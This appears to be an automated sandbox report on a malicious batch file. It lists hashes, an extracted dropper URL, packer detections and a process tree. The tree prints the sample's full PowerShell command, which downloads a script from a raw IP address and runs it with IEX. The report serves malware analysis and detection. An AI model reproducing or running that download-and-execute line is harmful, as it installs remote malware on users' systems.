Analysis
max time kernel: 121s
max time network: 123s
platform: windows10_x64
resource: win10
submitted: 04-08-2020 12:19
Static task: static1
Behavioral task: behavioral1
  Sample: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win7v200722 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
Size: 215B
MD5: d0dba6d8db0dbf8637507b05349fd02f
SHA1: e3795cff8728780bd8d72ae5f7e317ee93075e93
SHA256: 085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
SHA512: de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
  ps1.dropper  http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3844  WerFault.exe   (this row is reported 14 times)

ServiceHost packer (5 IoCs)
Detects ServiceHost packer used for .NET malware
Processes:
  resource                                                  yara_rule
  behavioral2/memory/4044-3-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/4044-2-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/4044-4-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/4044-5-0x0000000000000000-mapping.dmp  servicehost
  behavioral2/memory/4044-6-0x0000000000000000-mapping.dmp  servicehost

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process  target process
  PID 3676 wrote to memory of 4044  3676  cmd.exe  powershell.exe   (this row is reported 3 times)

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3844  4044        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3844  WerFault.exe
  Token: SeBackupPrivilege   3844  WerFault.exe
  Token: SeDebugPrivilege    3844  WerFault.exe
Processes
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"
  PID: 3676
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"
    PID: 4044
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 700
      PID: 3844
      - Suspicious behavior: EnumeratesProcesses
      - Program crash
      - Suspicious use of AdjustPrivilegeToken